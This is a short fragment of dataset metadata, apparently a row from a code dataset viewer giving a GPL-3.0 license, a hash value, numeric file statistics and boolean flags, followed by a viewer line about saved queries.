| gpl-3.0 | -6,370,282,057,669,393,000 | 25.286885 | 91 | 0.688806 | false | 3.508753 | false | false | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.